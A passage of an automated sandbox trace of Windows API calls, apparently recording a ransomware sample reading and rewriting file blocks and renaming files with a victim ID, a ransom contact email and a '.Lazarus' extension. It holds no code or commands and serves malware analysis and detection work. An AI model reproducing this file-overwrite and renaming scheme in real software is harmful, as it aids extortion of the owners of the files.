lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0062.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.175] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.175] AreFileApisANSI () returned 1 [0062.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0062.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4a) returned 0x6d688 [0062.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x6d688, cchWideChar=37 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 37 [0062.176] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x66ea7e00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0x66ea7e00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0x66ea7e00, ftLastWriteTime.dwHighDateTime=0x1cac6e3, nFileSizeHigh=0x0, nFileSizeLow=0xad1384b)) returned 1 [0062.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0062.176] AreFileApisANSI () returned 1 [0062.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0062.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0062.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0062.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0062.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0062.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0062.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0062.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0062.260] GetLastError () returned 0x0 [0062.261] SetLastError (dwErrCode=0x0) [0062.261] AreFileApisANSI () returned 1 [0062.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0062.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4a) returned 0x6d0b0 [0062.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x6d0b0, cchWideChar=37 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 37 [0062.261] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0062.261] GetFileType (hFile=0x410) returned 0x1 [0062.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0062.261] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0062.261] ReadFile (in: hFile=0x410, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0062.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0062.286] ReadFile (in: hFile=0x410, lpBuffer=0x8d438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0062.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5a0 [0062.362] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0062.363] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e298 [0062.363] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8e440 [0062.363] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bae0 [0062.363] GetLastError () returned 0x0 [0062.363] SetLastError (dwErrCode=0x0) [0062.363] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0062.363] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0062.363] WriteFile (in: hFile=0x410, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0062.363] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0062.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0062.364] CloseHandle (hObject=0x410) returned 1 [0063.954] AreFileApisANSI () returned 1 [0063.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0063.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4a) returned 0x6d738 [0063.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x6d738, cchWideChar=37 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 37 [0063.954] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0063.954] GetFileType (hFile=0x410) returned 0x1 [0063.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0063.954] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0063.954] ReadFile (in: hFile=0x410, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0063.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0063.955] ReadFile (in: hFile=0x410, lpBuffer=0x85fc0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0063.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e298 [0063.956] GetLastError () returned 0x0 [0063.956] SetLastError (dwErrCode=0x0) [0063.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0063.956] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0063.956] WriteFile (in: hFile=0x410, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0063.956] WriteFile (in: hFile=0x410, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0063.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0063.957] CloseHandle (hObject=0x410) returned 1 [0064.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0064.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x69300 [0064.400] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0064.400] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75b70 [0064.400] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0064.400] AreFileApisANSI () returned 1 [0064.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0064.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4a) returned 0x6d478 [0064.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x6d478, cchWideChar=37 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 37 [0064.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75b70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 99 [0064.401] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc6) returned 0x51398 [0064.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75b70, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=99 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core.mzz.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 99 [0064.401] MoveFileExW (lpExistingFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz"), lpNewFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0064.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0064.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0064.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0064.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0064.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0064.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0064.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bae0 | out: hHeap=0x20000) returned 1 [0064.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0064.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0064.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0064.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0064.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0064.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0064.402] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0064.402] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0064.402] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xc183da00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0xc183da00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0xc183da00, ftLastWriteTime.dwHighDateTime=0x1cac6e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d0200, dwReserved0=0xacc99c75, dwReserved1=0xa72f3385, cFileName="netfx_Core_x64.msi", cAlternateFileName="NETFX_~1.MSI")) returned 1 [0064.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0064.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0064.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0064.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0064.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0064.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0064.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0064.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0064.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0064.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0064.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0064.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0064.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0064.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0064.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0064.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0064.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0064.402] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0064.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0064.402] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0064.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0064.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0064.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0064.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0064.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0064.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0064.403] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0064.403] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0064.403] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0064.403] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0064.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0064.403] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0064.403] AreFileApisANSI () returned 1 [0064.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core_x64.msi", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\netfx_Core_x64.msi", lpUsedDefaultChar=0x0) returned 41 [0064.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0064.403] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0064.403] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0064.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0064.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0064.403] AreFileApisANSI () returned 1 [0064.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0064.403] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67900 [0064.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 41 [0064.403] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0064.404] GetFileType (hFile=0x410) returned 0x1 [0064.404] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0064.404] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0064.404] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0064.405] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0064.405] CloseHandle (hObject=0x410) returned 1 [0064.405] AreFileApisANSI () returned 1 [0064.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0064.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67900 [0064.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 41 [0064.405] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0064.405] GetFileType (hFile=0x410) returned 0x1 [0064.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0064.405] CloseHandle (hObject=0x410) returned 1 [0064.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0064.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0064.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0064.405] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0064.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0064.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0064.405] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0064.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0064.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0064.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0064.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0064.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0064.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0064.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0064.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0064.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0064.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0064.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0064.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0064.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0064.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0064.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0064.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0064.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0064.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0064.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0064.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0064.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0064.406] AreFileApisANSI () returned 1 [0064.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0064.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67900 [0064.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Core_x64.msi") returned 41 [0064.406] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\netfx_Core_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_core_x64.msi"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xc183da00, ftCreationTime.dwHighDateTime=0x1cac6e3, ftLastAccessTime.dwLowDateTime=0xc183da00, ftLastAccessTime.dwHighDateTime=0x1cac6e3, ftLastWriteTime.dwLowDateTime=0xc183da00, ftLastWriteTime.dwHighDateTime=0x1cac6e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d0200)) returned 1 [0064.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0064.406] AreFileApisANSI () returned 1 [0064.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0064.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0064.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0064.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0064.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0064.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0064.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0064.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0064.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0064.407] 